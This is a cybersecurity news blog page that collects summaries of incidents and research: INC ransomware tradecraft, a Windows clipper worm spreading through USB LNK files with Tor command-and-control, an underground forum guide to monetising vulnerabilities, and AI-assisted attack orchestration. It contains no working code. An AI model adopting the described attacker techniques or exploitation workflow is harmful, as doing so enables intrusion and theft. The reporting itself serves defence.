Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

European Union
Cyber Networks cyber resilience Cyber Security Cyberattacks Cybersecurity Precautions EU European Union

Ukraine Joins EU Cybersecurity Reserve to Strengthen Cyber Resilience and Emergency Response

 

Now able to tap into the EU’s emergency cyber network, Ukraine joins a support framework cleared by the Council of the European Union. When overwhelming cyberattacks strike, help may come faster because Kyiv can formally seek aid beyond what it handles alone. Specialized teams and resources from across the bloc stand ready, activated through shared crisis procedures. 

This link strengthens real-time defense options amid severe digital threats. Help arrives via the EU Cybersecurity Reserve, run by ENISA - the European Union’s cybersecurity agency. Born from the Cyber Solidarity Act, it lets member nations turn to vetted private experts if local teams cannot keep up. As attacks grow more complex, ties in tech defense strengthen between the bloc and Ukraine. Their collaboration now includes shared readiness against online risks. 

If a cyberattack overwhelms Ukraine’s internal resources, it can officially trigger emergency support through the framework. When that happens, digital security specialists from various European nations might step in to help control, examine, and recover systems. Officials view this measure as one piece of wider work aimed at boosting readiness, speeding up reactions, and building stronger collaboration amid rising complexity in online attacks. 

Though cyber threats grow more frequent, unity among nations strengthens defenses. Because attacks target government systems, companies, and vital services, joint efforts matter more now. The European Commission views this move as a step toward stronger cooperation. When one country acts alone, risks rise - yet shared knowledge reduces vulnerability. As digital dangers spread, responses must shift from isolated attempts to unified strategies. Now ranking as the second non-EU nation within the reserve, Ukraine follows Moldova’s inclusion during 2024. 

That year, rising cyber threats tied to Russian activity prompted Moldova’s entry. Seen by European authorities as pivotal for regional collaboration on digital security, its involvement highlights ongoing efforts. Resilience in cyberspace continues shaping how the EU engages nearby states. Progress here reflects broader aims, yet depends heavily on real-time readiness. Besides tackling cyber threats, the European Union now works more closely with Moldova on various digital fronts. 

Recently, an accord was reached politically, paving the way for Moldova’s entry into the EU Roaming Zone - pending official approval. Should it pass, people from both regions could make calls, send messages, or access data while traveling, free of extra fees. Now operating within the EU Third Countries’ Trusted List, Moldova streamlines how electronic signatures and digital seals are recognized across entities and individuals. 

Backed by EU funding, a fresh node of the European Digital Media Observatory - named FACT - emerges to counter disinformation and external manipulation efforts. Now comes news on cyber defense, right after fresh progress in how the EU engages Ukraine and Moldova. Talks to join the bloc officially started, backed unanimously by national leaders lately. 

Marking the moment, Commission head Ursula von der Leyen called it a turning point - not just symbolic, but rooted in real changes made amid hardship. Her view: this step shows lasting support for peace, resilience, and shared effort where it matters most. 

Now more shielded, Ukraine taps into the EU Cybersecurity Reserve, linking efforts with European allies when large-scale digital threats emerge. This cooperation builds lasting strength in facing future attacks, not just immediate fixes. Through shared response channels, new stability takes root beyond borders. Long-term readiness grows quietly but steadily from such joint undertakings.
Read more »
Telegram Ban
Mobile Security NEET UG NTA Paper Leak Telegram Ban

India Temporarily Bans Telegram Ahead of NEET UG 2026 Re-Exam to Curb Fraud

 

India has temporarily restricted Telegram ahead of the NEET UG 2026 re-examination, as authorities move to curb exam fraud and protect the integrity of one of the country’s most important medical entrance tests. The decision has drawn attention because Telegram is widely used for communication, study groups, and information sharing, making the restriction both significant and controversial. 

The action was taken after the National Testing Agency recommended stronger controls amid concerns that organized cheating groups were exploiting the app to circulate question papers and misleading claims. Officials said the temporary ban is intended to stop candidates from being targeted by fraud networks that can spread manipulated content quickly during a high-stakes exam period. 

Under the order, access to Telegram in India is restricted until June 22, 2026, covering the exam day and the immediate aftermath. Authorities also directed the company to disable its message-editing feature in India until June 30, 2026, saying that feature had allegedly been misused to make old posts look like proof of a paper leak. 

The measure has sparked debate because Telegram is used not only for illicit activity but also for legitimate education, work, and community communication. Telegram has reportedly challenged the decision in court, while the Delhi High Court upheld the government’s temporary block on June 19, citing emergency grounds and compliance with the law. 

The broader issue goes beyond one app: exam leaks and digital fraud are becoming harder to control as messaging platforms, edited content, and anonymous groups make false claims easier to spread. For students, the immediate focus is on the re-exam schedule, but for policymakers, the case is a reminder that future exam security may require faster monitoring, tighter platform cooperation, and clearer digital enforcement rules.
Read more »
spear phishing
BYOVD Attack Inc ransomware LockBit malware Ransomware spear phishing

INC Ransomware Climbs Into Top Tier of Cybercrime Operations, Surpasses 830 Victims

 



The ransomware operation known as INC has grown into one of the most active cybercrime groups of 2026, with security researchers linking it to more than 830 victims since it first appeared in August 2023.

According to researchers at Acronis, the group's rise coincided with disruptions affecting major ransomware brands such as LockBit and BlackCat. As affiliates sought alternative platforms, INC appears to have benefited from that shift. More than 65% of the victims listed by the group are based in the United States, with legal firms, healthcare providers, manufacturers, construction companies, and technology organizations among the most frequently targeted sectors.

Researchers also observed major changes to the ransomware itself. INC's malware for Windows and Linux/VMware ESXi systems has been rewritten in Rust, a programming language increasingly adopted by malware developers because it supports multiple operating systems and can complicate reverse-engineering efforts.

The group's toolkit has expanded as well. Recent attacks have involved a credential-stealing utility capable of extracting authentication data from newer Veeam backup deployments that use salted DPAPI encryption. Access to backup infrastructure can give attackers valuable credentials while also making recovery efforts more difficult for victims.

Acronis noted that the sale of INC's Windows and Linux ransomware variants on underground cybercrime forums in May 2024 contributed to the appearance of related ransomware families, including Lynx and Sinobi. Researchers identified significant code similarities between the groups.

Investigators found that INC affiliates rely on several entry points to compromise networks, including spear-phishing campaigns, credentials purchased from Initial Access Brokers (IABs), and the exploitation of publicly exposed systems running vulnerable versions of Citrix NetScaler, Fortinet EMS, and SimpleHelp software.

Once inside a network, attackers harvest credentials, move between systems using legitimate administrative tools such as RDP and PsExec, and attempt to weaken security controls through a technique known as Bring Your Own Vulnerable Driver (BYOVD). Researchers observed the use of vulnerable drivers including filwfp.sys, filnk.sys, and fildds.sys. The group also deploys tools such as Cobalt Strike, AnyDesk, ScreenConnect, and TeamViewer to maintain access and control compromised environments.

Before encryption begins, stolen files are collected and transferred using Rclone, often after being packaged into password-protected archives. The ransomware then encrypts systems using multithreading and partial-encryption techniques to speed up the process. When launched against VMware ESXi environments, the malware can also attempt to shut down virtual machines.

Data from ZeroFox ranked INC as the fourth most active ransomware operation during the first quarter of 2026, recording more than 120 incidents. Researchers said the group's growth demonstrates how ransomware operators can build large-scale campaigns using widely available tools, stolen credentials, and unpatched systems rather than relying on highly specialized malware.

Read more »
TinyPulse breach
Data Breach employee data leak Nintendo Nintendo of America ransomware attack Shadowbyt3$ TinyPulse breach

Nintendo Confirms Third-Party Survey Data Breach, Says Customer Information Remains Secure

 


 Nintendo of America has acknowledged that employee survey data was exposed through a security incident involving TinyPulse, a third-party platform used for internal feedback and engagement surveys. The company emphasized that its own systems were not compromised and that no customer or financial information was affected.

The confirmation follows claims made by the Shadowbyt3$ cybercrime group, which alleged that it had obtained sensitive information linked to Nintendo of America employees.

“We are aware of an issue involving TinyPulse, a third-party service used for internal employee surveys at Nintendo of America,” stated Nintendo.

“Nintendo’s systems have not been compromised, and no personal customer or financial data has been accessed. Nintendo’s systems have not been compromised, and no personal customer or financial data has been accessed."

"The data involved is limited to internal survey content comprising a small subset of our employees, and most of the information dates back several years,” the company told BleepingComputer.

Nintendo of America, which oversees operations across the United States, Canada, and parts of Latin America, explained that the affected information was restricted to internal survey content collected through TinyPulse.

TinyPulse is a workplace engagement platform that enables organizations to conduct anonymous employee surveys, gather feedback, analyze workforce sentiment, and assess company culture.

Nintendo added that it is “working with the service provider to address the issue.”

Meanwhile, BleepingComputer reached out to WebMD Health Services, the owner of TinyPulse, seeking additional details about the incident and its potential impact. However, no response had been received at the time of publication.

Despite Nintendo’s statement that only survey-related information was exposed, the Shadowbyt3$ group claims the stolen data includes more extensive employee records.

The threat actor initially alleged that nearly 1GB of data had been taken from Nintendo and gave the company 48 hours to begin negotiations before the information would be released publicly.

According to the group, the dataset contains employee names, email addresses, survey and analytics information, bank statements, W-9 forms, employee identification details, progress plans, and reports spanning from 2016 to 2026.

"If you contact us we give you an extra day to think this through. We are demanding a ransom payment of 2 million dollars," reads the Shadowbyt3$ post.

In a follow-up statement, the group claimed that the incident did not impact Nintendo’s gaming operations and instead affected “a small amount of employees that work for nintendo and have used tinypulse.”

The attackers later published another message suggesting additional organizations could be targeted and shared a link to what they claimed was leaked employee communications. The post implied that Nintendo declined to meet the ransom demand.

BleepingComputer stated that it did not download or verify the authenticity of the allegedly leaked files. Regardless of the claims, Nintendo has maintained that customer information was not involved in the incident and that users do not need to take any action.

Shadowbyt3$ is a relatively new cybercriminal operation that describes itself as an “extortion as a service” group and claims to have been active since October 2025. The group says it publishes stolen information from organizations that refuse to pay ransom demands and promises that data “will be Deleted Permanently and you will not hear from us again” if a payment agreement is reached.

Cybersecurity experts and law enforcement agencies continue to advise organizations against paying ransom demands, noting that doing so can encourage future attacks. They also warn that there is no assurance stolen information will not be retained or sold even after a payment is made.

Read more »
Windows Clipper Malware
Clipboard hijacking cryptocurrency theft malware Microsoft security Remote Code Execution Tor-Based C2 USB LNK Worm Windows Clipper Malware

Microsoft Exposes Malware Operation Combining USB LNK Worms and Tor-Based C2 Servers

 


A threat actor will benefit from combining cryptocurrency theft, covert communications, and remote access into a single malware framework in order to increase stealth and persistence. Microsoft has revealed the existence of a Windows-based clipper campaign active since February 2026. The clipper campaign uses a portable Tor client, Windows Script Host, and ActiveX components to communicate with a hidden command-and-control server. 

Besides intercepting and replacing cryptocurrency wallet addresses, the malware also performs continuous clipboard monitoring, captures screenshots, exfiltrates stolen data, and executes remote commands. 

A key characteristic of the operation is that it does not utilize traditional installer mechanisms or publicly exposed C2 servers and instead utilizes Tor-routed traffic as a means of concealing its activity and extends its capabilities to lightweight backdoor functions as well as financial theft. USB-Borne Infection Chain Drives Initial Compromise Upon further investigation, it was revealed that the operation is characterized by a multi-stage infection chain combining removable media propagation with credential and asset theft. 

In Microsoft's opinion, the campaign originated through malicious Windows shortcut (.LNK) files distributed through USB storage devices, enabling the malware to spread without relying on online delivery mechanisms. An infection after being executed deploys two components: a worm that propagates throughout additional removable drives, and a clipper module designed to obtain information about cryptocurrency seed phrases, private keys, and wallets. 

Obfuscation and Persistence Mechanisms Enhance Stealth As part of its propagation mechanism, the worm exploits the trust of users in familiar file formats. When it scans USB devices for commonly accessed document formats like Microsoft Word, Excel, and PDF, it conceals the original filenames and replaces them with malicious shortcuts named identically. 

In addition to increasing user interaction, this strategy masks the infection process by enabling additional payloads to be unpacked into randomly generated directories within the Public Documents path upon execution, and thereafter persistence can be established by scheduling tasks. In order to minimize the possibility of detection, the malware attempts to modify local defenses by creating antivirus exclusions for its staging locations and executable components in order to avoid detection. 

According to Microsoft, extensive efforts have been made to obstruct the process of forensic analysis, such as packaging the installer with PyInstaller and obfuscation with PyArmor, and using JavaScript-based modules with layered encryption as well as runtime decryption. This malware performs an anti-analysis check by searching for Windows Task Manager processes and terminating execution if monitoring is detected, underscoring the operator's emphasis on long-term stealth and evasion. 

Tor-Based Communications Power Clipboard Hijacking Operations Upon clearing the anti-analysis checks and activating the stealer module, the malware enters into a highly automated surveillance phase designed to detect and intercept cryptocurrency-related activity in near real-time. Microsoft observed that a Tor executable named ugate.exe is used by the component to communicate with its hidden command and control infrastructure, enabling all traffic to be routed through anonymized channels as well.

Once the malware has been installed, it periodically checks the system clipboard for a specific set of highly valuable cryptocurrency artifacts, searching for these artifacts every 500 milliseconds. Among these include 12-word and 24-word recovery phrases for Bitcoin, Ethereum private keys, Bitcoin wallet import format keys (WIF), as well as wallet addresses for Tron and Monero in addition to Bitcoin legacy, P2SH, Bech32, and Taproot formats. 

Upon detection of an identical entry, the malware silently replaces it with the address of an attacker's wallet. By carefully selecting substituted addresses to share similar leading characters or numeric patterns with the original destination, the likelihood of detection during visual verification is reduced. During the final stage of the infection, the malware emphasizes the importance of operating concealment and attacker control. 

By launching a renamed Tor executable in the background, the malware is able to identify the compromised host and register it with an external infrastructure without exposing direct network communications to the outside world. 

Upon enrollment, the infected system begins a continuous operational cycle, polling the command-and-control environment for instructions while simultaneously inspecting the clipboard contents at approximately half-second intervals to identify cryptocurrency seed phrases, private keys, and wallets. 

Also, command responses containing the EVAL directive enable the operators to execute attacker-supplied code in real-time, allowing them to expand functionality or take subsequent actions after a compromise. 

The mixture of scripting abuse, removable media propagation, and Tor-based communications indicates Microsoft's recommendation that behavioral detection strategies should be prioritized. These strategies include monitoring PowerShell-driven screen capture activity, suspicious use of WScript and CScript, and script-engine processes spawning unexpected executables, including curl, cmd.exe, PowerShell, or other unexpected executables.

Besides disabling AutoRun and AutoPlay for removable media, Group Policy controls can also be used to restrict the execution of LNK from USB devices, limiting unnecessary access to scripting engines, and monitoring clipboard monitoring and screen capture behavior on systems involving cryptocurrency or other sensitive financial transactions closely. 

Remote Code Execution Expands Malware Capabilities Researchers discovered that the campaign's data collection capabilities go beyond clipboard manipulation. A number of screenshots were taken and transferred to the command-and-control server through the native curl utility, providing operators with continuous insight into the activity of the victims. 

Furthermore, it integrates remote code execution functionality, thereby extending the framework's operational scope beyond a conventional cryptocurrency clipper. By using the EVAL command, operators can instruct the malware to retrieve additional JavaScript payloads, save them locally as cfile files, and execute them directly on the compromised host by instructing the malware to do so. 

Essentially, this capability allows the infection to become an on-demand access platform that is capable of deploying new functionality after initial compromise. Because the malware is highly obfuscated and continuously evolving, Microsoft noted that behavioral indicators offer a more reliable detection opportunity than static signatures. There are several indications that security teams should monitor suspicious activity associated with wscript.exe and cscript.exe, unexpected executions of curl, PowerShell, and cmd.exe, as well as anomalous child process chains. 

Additionally, connections directed to localhost:9050 and other indications of Tor proxy usage may provide valuable indications that this campaign was compromised. Microsoft's campaign illustrates how traditional malware techniques can be combined with anonymous infrastructure and scripting-based execution to create threats that are not only difficult to detect but also highly adaptable as cybercriminal operations continue to evolve. 

In environments characterized by removable media and digital asset transactions, the findings underscore the importance of monitoring behavioral indicators in conjunction with conventional security controls. In order to identify attacks that prioritize stealth over scale, defenders must continue to have access to unusual script activity, Tor-related communications, and clipboard manipulation.
Read more »
vulnerability exploitation
cybercrime forums Cybersecurity hacking tutorial Nuclei framework threat actors Vulnerabilities and Exploits vulnerability disclosure vulnerability exploitation

Underground Forum Tutorial Reveals How Cybercriminal Communities Teach Vulnerability Exploitation and Profit-Making

 

A forum discussion titled “Hacking for Profit. Working method” has provided cybersecurity researchers with a unique look into how underground communities educate aspiring hackers on vulnerability exploitation and monetization. While the original post is neither highly technical nor extensive, its significance lies in presenting a structured, easy-to-follow roadmap that simplifies a complex process.

The post, authored by a threat actor operating under the alias "Hercules," outlines the stages of identifying, assessing, exploiting, and ultimately profiting from vulnerabilities. Researchers from Flare examined both the original content and the subsequent discussions over several months, finding that the thread sparked considerable engagement among forum members.

The discussion attracted numerous responses from users who expressed appreciation for the guidance, sought private communication with "Hercules," and identified themselves as beginners hoping to transition from theoretical cybersecurity knowledge to practical application. According to researchers, the thread appeared to serve as more than just an instructional post, functioning as a source of motivation and mentorship for inexperienced individuals.

The popularity of the tutorial extended beyond its original platform, with the same methodology being reposted and debated across four additional underground forums. Through the post, "Hercules" presents a straightforward framework that helps novice threat actors understand vulnerability exploitation and methods of generating revenue from discovered flaws.

The guide begins by advising readers on how to monitor newly disclosed vulnerabilities, particularly high-impact categories such as remote code execution (RCE), authentication bypass, account takeover, insecure direct object references (IDOR), and data exposure vulnerabilities. It then explains how to locate potentially vulnerable systems, verify exposure, and determine whether findings should be reported, sold, or exploited.

Researchers identified three particularly notable aspects of the tutorial. First, it highlights the use of the Nuclei framework developed by ProjectDiscovery, a widely adopted tool among offensive security professionals. Second, it demonstrates an understanding of the difficulties organizations face when patching newly disclosed vulnerabilities. Third, the tutorial is deliberately separated into “legal” and “illegal” paths, allowing readers to choose at which stage they transition from vulnerability disclosure activities into malicious actions.

One of the tutorial’s most effective features is its approachable tone. Rather than relying on technical jargon, "Hercules" explains concepts in simple language and portrays hacking as a skill that can be learned through practical experience.

He argues that many educational resources focus excessively on subjects such as operating systems, programming languages, scanner configurations, and computer science fundamentals, while many newcomers simply want to "hack," "break in," and "gain access."

The author further suggests that aspiring hackers do not need advanced software development expertise to get started. Publicly available tools, community-created templates, automation, and artificial intelligence are presented as resources that lower the entry barrier, while programming knowledge is described as beneficial but not essential.

This message resonated strongly with forum members. One participant noted that despite completing numerous hacking courses, they struggled to apply their knowledge in real-world scenarios. Another admitted having no programming experience and questioned whether that would prevent them from succeeding.

Many respondents praised the post for its clarity and organization, while others requested direct mentorship or private communication with "Hercules."

A key element of the tutorial is its focus on turning vulnerability discoveries into financial opportunities. According to "Hercules," individuals who uncover vulnerabilities have several options available.

One approach involves contacting the owner of the affected website, server, or hosting provider and offering vulnerability details in exchange for compensation. As the author explains, some organizations are willing to reward responsible disclosure efforts, adding that “…you can take your money home and be proud of yourself”.

The tutorial also discusses selling discovered vulnerabilities through underground marketplaces. In some cases, "Hercules" suggests that actors may simultaneously approach the victim while marketing the same information elsewhere.

Additionally, the guide encourages exploiting vulnerabilities to determine what assets or information reside on compromised systems. Remote code execution vulnerabilities are described as opportunities that can be sold to botnet operators, abused for unauthorized resource usage, or leveraged for data theft. Similarly, account takeover, IDOR, and data leakage vulnerabilities are portrayed as valuable commodities that can be quickly monetized.

"Hercules" characterizes himself as a hacker rather than a fraudster, claiming a preference for rapid sales of access or information rather than engaging in subsequent fraudulent activities.

The forum responses indicate that the thread's influence stemmed from the confidence and practical direction it provided rather than from groundbreaking technical information.

Many users requested additional mentorship, private conversations, and more detailed follow-up material. Others expressed frustration with the limitations of theoretical learning and viewed the tutorial as a useful bridge toward hands-on experience.

Researchers noted that unlike highly technical exploit analyses, which typically appeal to a specialized audience, simple and motivational workflows can attract a much broader group of aspiring participants. Because the methodology is not tied to any specific vulnerability, its relevance can persist for extended periods.

The tutorial promotes a repeatable process: monitor newly disclosed vulnerabilities, identify exposed systems, validate findings, monetize opportunities, and repeat the cycle. This mindset, researchers suggest, provides insight into how inexperienced actors are introduced to cybercrime and encouraged to prioritize certain categories of vulnerabilities.

The post also appears to function as an informal recruitment channel, as "Hercules" repeatedly encourages users to initiate private conversations.

The tutorial highlights several important considerations for organizations responsible for cybersecurity.

First, critical vulnerabilities that are easily reachable remain prime targets for attackers. While automated botnets often begin scanning for exploitable systems shortly after vulnerabilities and proof-of-concept exploits become public, the tutorial demonstrates that even novice threat actors are being encouraged to pursue these opportunities.

Second, older vulnerabilities continue to pose significant risks. Legacy systems running outdated versions of platforms such as Drupal or WordPress may remain attractive targets for less experienced attackers seeking accessible entry points.

Third, researchers emphasize the importance of maintaining effective vulnerability disclosure programs. Financial incentives can encourage security researchers to report vulnerabilities responsibly rather than seeking alternative methods of monetization. Even if information eventually reaches underground markets, early disclosure provides organizations with an opportunity to mitigate risk before widespread exploitation .

Researchers argue that the significance of the thread lies not in the introduction of a new exploitation technique but in its ability to simplify cybercrime into a repeatable business process.

By transforming a technically complex subject into an understandable workflow, "Hercules" makes vulnerability exploitation appear achievable to newcomers. The enthusiastic responses from inexperienced users suggest that this approach is effective.

The findings underscore a broader trend within the cybercrime ecosystem: malicious capabilities do not grow solely through advanced malware development or zero-day discoveries. They also expand through accessible tutorials, mentorship, publicly available tools, and online communities that lower barriers to entry and make illicit activity appear attainable.

Read more »
iOS security
Ad Blockers Ad Blocking Ads App security Apple Apple security features Cyber Security iOS iOS security

New Apple Ad Blocker Filtr Expands Protection Beyond Browsers on iPhone, iPad and Mac

 

Filtr, a fresh ad-blocking app, extends privacy for Apple device owners. Instead of limiting itself to web browsers, it stops advertisements inside mobile and desktop applications too. Created by Kaylee Serena Calderolla - known for developing Wipr, a tool that blocks ads in Safari - it taps into features unveiled in iOS 26 and macOS 26. Through these updates, the software intercepts ad-related data directly within the system’s network layer. Beyond the usual add-ons confined to Safari alone, Filtr taps into Apple’s updated method for handling web traffic. 

With that foundation, it intercepts connections aimed at known ad networks long before content appears - stopping trackers and pop-ups not just in browsers but throughout compatible apps. Blocking happens earlier, silently, cutting down unwanted surveillance along with cluttered visuals wherever digital activity occurs. Filtr comes as a premium feature inside Wipr, an often-used tool that stops ads in Safari. 

Its creator, Calderolla, claims it runs without gathering any personal details or needing entry to sensitive user content. Updates to a custom blocklist - kept current by the maker - allow the filter system to work effectively. Working begins with an initial screening done locally on the device. This step uses a built-in catalog of sites that often serve ads. When uncertainty remains, a follow-up check occurs using a fuller database kept by Calderolla. Communication moves through Apple’s infrastructure, which keeps individual users anonymous to service creators. 

Only matching results trigger deeper analysis, limiting exposure of personal activity. Some people trying the function notice fewer commercials when opening certain programs, though a few show blank spaces instead of promotions. Enabling the link blocker just one time lets the software manage changes on its own, making preparation straightforward. Not every application behaves the same way - some skip ads entirely, others leave gaps. Updates happen in the background after initial activation, reducing ongoing effort. Filtr cannot stop all ads - some slip through when they come straight from an app’s built-in servers. 

Since cutting those might break how the app works, certain promotions stay visible. So, while using platforms like Facebook, Google, or Reddit, users may still spot occasional banners. Even with its constraints, progress shows clearly in how Wipr tackles ads across Apple devices. Priced at five dollars, it works on any device, whereas Filtr adds yearly fees unless users opt to pay twenty-five upfront inside the app.
Read more »
Zcash
Bitcoin Cyber Security Orchard Privacy Zcash

Peter Todd Warns Zcash Privacy Tech Is Too Risky for Bitcoin Consensus Layer

 

Bitcoin developer Peter Todd has warned that Zcash-style privacy technology is too risky to integrate into Bitcoin’s consensus layer, arguing that the cryptographic complexity behind Zcash’s shielded transactions introduces unacceptable operational risk for Bitcoin’s base protocol. His comments erupted after the Zcash Open Development Lab disclosed a critical issue in Zcash’s Orchard shielded pool on June 1, 2026, which temporarily paralyzed the network and required an emergency hard fork to fix. 

The vulnerability affected Orchard, Zcash’s most widely used shielded pool for private transactions, and was discovered during routine security auditing on May 29 by researcher Taylor Hornby using an AI-assisted tool. The flaw centered on just two lines of code in the Orchard circuit, the cryptographic core that processes Zcash’s private transactions, and dated back to when Orchard launched in May 2022. CoinDesk reported that the issue could theoretically have allowed an attacker to mint counterfeit ZEC without leaving any on-chain evidence, though the bug was identified before any known exploitation occurred. 

Fixing it demanded a coordinated hard fork that forced nodes, wallets, and block explorers to update simultaneously, with Orchard transactions suspended during the upgrade window until re-enabled around 23:00 EDT on June 1. Nodes that failed to upgrade quickly became desynchronized, leaving the network paralyzed for several hours and exposing a major coordination problem unique to complex privacy protocols. Todd’s argument centers on the difference between visible and hidden failures in blockchain systems. In Bitcoin’s transparent accounting model, counterfeit coins or invalid outputs are immediately visible on-chain, making it relatively straightforward to detect bugs, identify affected coins, and reverse the chain if necessary. 

He cited Bitcoin’s 2010 value overflow incident and 2013 chain split as examples where rollback was feasible because only a small fraction of coins were affected and the exploit was trivial to notice. In Zcash’s shielded system, however, privacy cryptography using Halo 2 zk-SNARKs allows transaction validation without revealing sender, recipient, or amount, creating a dangerous blind spot where a bug could destroy shielded funds without developers being able to quantify the damage in real time. 

Todd emphasized that approximately 30% of Zcash’s total supply is already shielded in the Orchard pool, meaning a catastrophic failure would wipe out holdings for a high percentage of all Zcash users. He rejected comparisons to Bitcoin’s historical bugs, stating that neither the 2010 overflow nor CVE-2018-17144 could destroy the currency because counterfeit coins were trivially visible and easily rolled back. 

He argued that different types of cryptography have different levels of risk, and that Zcash-style cryptography carries a very high risk level reflected in Zcash having experienced much more serious issues than Bitcoin. The debate reflects a fundamental divide in crypto between innovation and protocol conservatism, with Todd favoring maintaining Bitcoin’s deliberately simple core design. 

Privacy advocates seeking Bitcoin improvements without consensus-layer changes point to Silent Payments, an application-layer solution that generates unique addresses for each transaction without exposing payment history. Unlike Zcash’s approach, Silent Payments does not modify Bitcoin’s base protocol, though adoption remains limited to wallets like Sparrow Wallet and Cake Wallet. At press time after the incident, ZEC traded around $532 following a 37.8% slide before recovering, demonstrating market volatility tied to Orchard’s technical stability.
Read more »
phishing
AI Driven Cyber Attacks Anthropic Artificial Intelligence MITRE ATT&CK phishing

Researchers Warn AI Is Blurring the Line Between Skilled and Unskilled Hackers

 




For years, cybersecurity teams have relied on established methods to determine how dangerous a threat actor might be. Analysts typically examine the techniques an attacker uses, the tools involved, and the complexity of an operation to estimate the level of risk. New research from Anthropic, however, recommends that artificial intelligence is beginning to disrupt those assumptions.

The company's Frontier Red Team recently analyzed 832 user accounts that were removed from Anthropic's platforms for engaging in malicious cyber activity between March 2025 and March 2026. Researchers compared the observed behavior against the MITRE ATT&CK framework, a widely used industry resource that categorizes adversary tactics and techniques. Portions of the findings were also referenced in Verizon's 2026 Data Breach Investigations Report.

It's a signal to keep up with how cybercriminals are using AI. Rather than limiting AI to basic tasks, attackers are increasingly applying it to activities that take place after gaining access to a target environment. This trend suggests that AI is becoming part of deeper operational stages of cyber intrusions, including tasks that traditionally required stronger technical expertise.

Among all observed cases, malware development was the most common use of AI. Researchers found that 560 of the 832 analyzed accounts, representing more than two-thirds of the dataset, used AI-assisted tools to help create or modify malicious software. While this finding was expected, the more notable change appeared elsewhere.

Throughout the study period, researchers recorded a movement away from AI-assisted initial access activities and toward post-compromise operations. One example was account discovery, a process attackers use to identify valid user accounts within a breached network. AI-assisted account discovery increased by 8.9% during the reporting period. By contrast, AI-supported phishing activity declined by 8.6%.

The data also showed growing use of AI during lateral movement operations. Lateral movement refers to the actions attackers take after entering a network to expand their access and reach more valuable systems, users, or data repositories. According to the report, 54 of the 832 observed actors used AI assistance during this stage of an intrusion.

Historically, activities such as account discovery, privilege escalation, and lateral movement have been associated with more experienced operators because they require a stronger understanding of network environments and attack workflows. Researchers argue that AI is reducing those technical barriers, allowing a broader range of actors to perform tasks that were previously more difficult to execute effectively.

This change became visible in the study's risk assessment data. During the first half of the observation period, approximately 33% of threat actors were categorized as medium-risk or higher. During the second half, that proportion rose to 56%. Researchers described this increase as evidence that AI is helping a larger segment of the threat landscape carry out more advanced cyber activity.

The findings also raise questions about how the industry evaluates attacker sophistication. Security teams have long treated the number of techniques used during an attack as an indicator of capability. Anthropic's analysis suggests that this relationship is becoming less reliable in AI-assisted environments.

Researchers found only a small difference between lower-risk and higher-risk actors when measuring the number of techniques used. Less sophisticated actors employed an average of 16 techniques, while the most capable actors averaged 20. The narrow gap indicates that technique counts alone may no longer provide a meaningful way to prioritize threats.

The same pattern appeared when researchers examined how attackers interacted with AI systems. Whether actors used Claude Code, direct API access, or standard chat interfaces showed little connection to their assessed risk level. Simply identifying which AI tool was used did not provide a clear indication of the threat posed by an actor.

Instead, researchers found that the location of AI usage within the attack lifecycle was a stronger indicator of risk. Higher-risk operators tended to apply AI to technically demanding stages of an intrusion, including internal reconnaissance, privilege escalation, and lateral movement. These activities often have a direct impact on how effectively an attacker can establish control over a compromised environment.

Even that distinction may not remain useful indefinitely. Researchers observed that these more advanced use cases are gradually spreading throughout the broader threat ecosystem. As AI tools become more accessible and capable, activities once associated with a smaller group of highly skilled operators may become increasingly common.

Anthropic identified another characteristic that separated the most dangerous actors from the rest. Rather than using AI for isolated tasks, some operators built systems around AI models that connected multiple attack stages together. This allowed AI to support planning, execution, and decision-making across larger portions of an operation with limited human involvement.

Researchers describe this capability as agentic attack orchestration. In practical terms, it refers to AI systems that can assist with coordinating different phases of an intrusion, helping move an attack from one stage to another without requiring constant manual direction from an operator.

According to the report, this rising behavior exposes a limitation in existing cybersecurity frameworks. MITRE ATT&CK was designed to document attacker actions and techniques. It was not built to measure the degree of autonomy involved when AI systems help coordinate those actions.

Anthropic underlined this challenge using a cyber-espionage campaign it disrupted in November 2025. The operation involved attempts to use Claude Code in support of intrusion activity targeting organizations in multiple regions with relatively little direct human intervention.

When researchers mapped the operation to MITRE ATT&CK, it generated a profile containing 30 techniques across 13 tactics. On paper, that profile appeared comparable to many medium-risk actors included in the study. However, Anthropic's internal evaluation system assigned the operation the maximum possible risk score of 100.

Researchers argue that the discrepancy exists because current frameworks focus on what actions occur during an attack rather than how those actions are coordinated. An AI-assisted system capable of executing commands, identifying vulnerabilities, collecting credentials, and adapting to changing conditions throughout an intrusion presents a different operational challenge than a human manually performing each step.

The report notes that there are currently no ATT&CK categories specifically designed to capture autonomous orchestration, automated chaining of attack stages, or the reduction of human decision-making throughout an attack lifecycle.

Anthropic says it is actively discussing potential framework updates with MITRE to better account for AI-enabled attack behaviors. The company has also used insights from the research to strengthen safeguards within its own models, including controls intended to detect and prevent misuse involving malware development and large-scale data theft attempts.

For defenders, the findings suggest that traditional indicators may no longer provide a complete picture of cyber risk. A threat actor using AI to automate portions of an attack may achieve outcomes similar to those of a more experienced operator performing the same tasks manually. Likewise, an individual using a basic chat interface could potentially conduct operations that resemble those performed through more advanced integrations.


Read more »
Wearable Device Security
AI Surveillance Risks Biometric Authentication Biometric Security Face Recognition Technology Facial Recognition Security Meta AI App Meta Smart Glasses Privacy Technology Wearable Device Security

Meta Faces Privacy Questions After Secret Face Recognition Code Discovery


The concept of facial recognition in consumer wearables remained largely a theoretical discussion for many years confined to research laboratories, privacy concerns, and product development. Having now discovered that Meta had quietly embedded facial recognition-related code within its Meta AI mobile application, the software that powers and supports its Ray-Ban and Oakley smart glasses ecosystem, this conversation is moving closer to reality. 

A system known as "NameTag" was discovered inside the smart glasses in order to process images captured through their cameras, generate biometric information, and match it with local data in order to recognize individuals in real time. Based on these findings, the integration of advanced computer vision capabilities into everyday consumer devices has been heightened, particularly when these capabilities appear in applications that are installed on tens of millions of smartphones well in advance of official announcements. 

Additionally, Meta's smart glasses platform continues to expand its capabilities, raising questions regarding transparency, biometric data handling, and the future of artificial intelligence-powered wearable technology. In further analysis of the software architecture, it is apparent that the NameTag framework was not limited to experimental code fragments, but rather was integrated into the Meta AI application, which is a mandatory companion application for several smart glasses features and has been downloaded by over 50 million people. 

An analysis of the system indicates that it was designed to capture facial imagery through the glasses, generate unique biometric templates known as faceprints, and compare the collected data with data stored locally on a user's device. Upon identifying a match, the application could generate recognition alerts to the wearer, while faces that could not immediately be matched were reportedly cropped, catalogued, and queued for future consideration. 

